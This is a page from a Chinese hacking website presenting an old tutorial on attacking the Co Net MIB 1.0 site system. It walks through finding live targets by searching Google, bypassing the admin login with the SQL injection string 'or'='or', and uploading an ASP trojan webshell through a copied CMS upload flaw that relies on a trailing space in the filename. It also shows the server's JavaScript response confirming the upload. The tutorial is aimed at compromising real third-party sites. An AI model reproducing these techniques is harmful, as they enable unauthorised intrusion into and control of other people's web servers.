欢迎来到 黑吧安全网聚焦网络安全前沿资讯,精华内容,交流技术心得!

Co Net MIB Ver 1.0 系统漏洞再利用

  • 软件大小:5.16 MB
  • 软件语言:简体中文
  • 软件类型:最新综合教程
  • 软件授权:免费教程
  • 更新时间:2005-06-13
  • 标签:
  • 开 发 商:http://www.myhack58.com
  • 应用平台:WinXP, Win7, Win8, WinAll
软件评分
网友评分:3

同类人气软件

立即下载

Co Net MIB Ver 1.0 系统漏洞再利用软件介绍

            Co Net MIB Ver 1.0 系统漏洞再利用

今天说的是利用Co Net MIB Ver 1.0 系统漏洞再利用,这个系统有个漏洞,好像没有看见有人发出来

,也许是我消息不灵,哈哈

不说废话,

这个系统的漏洞是后台管理可以用'or'='or'登陆

首先到google.com登陆搜索下,

哈哈,好多啊,

我就不找了,我已经找好了一个,影示下

看,进来了,网速慢,不好意思

这里可以上传图片

我们把asp木马改后缀传上去,

我不传了,因为有些问题马上要说

传好之后这里有个数据备份

看见了吧 数据库备份 ,但是我一点就错误了,这就是我要说的

第二个问题:

因为这个漏洞有人知道,但没有公布,所以很多人攻下后不允许备份了,

那怎么办,总不能眼铮铮的看者吧,

——

我仔细看了看这里有个产品管理慢............

呵呵...我的机器.

我们添加产品

换个网站,这个快点看到这里你是不是有点眼熟,对了

很明显是抄了动力的一部分代码,和动力的后台编辑是一样的

那么当然是利用动力的上传漏洞来传asp木马了,

我演示下我刚才改好了`

第一个放图片,

第二个木马并加个空格,parent.parent.myform.IncludePic.checked=true;

parent.parent.myform.DefaultPicUrl.value='UploadFiles/200569215723168.asp ';

parent.parent.myform.DefaultPicList.options[parent.parent.myform.DefaultPicList.length] = new Option('UploadFiles/200569215723168.asp ','UploadFiles/200569215723168.asp ');

parent.parent.myform.DefaultPicList.selectedIndex+=1;

if(parent.parent.myform.UploadFiles.value==''){

parent.parent.myform.UploadFiles.value+='UploadFiles/200569215723168.asp ';}

else{

parent.parent.myform.UploadFiles.value+='|'+'UploadFiles/200569215723168.asp ';}

alert('上传文件成功!');

呵呵木马上去了

下面我就不提升权限了,

郁闷ing .......这个服务器很变态

好了,就这样88

  • 热门下载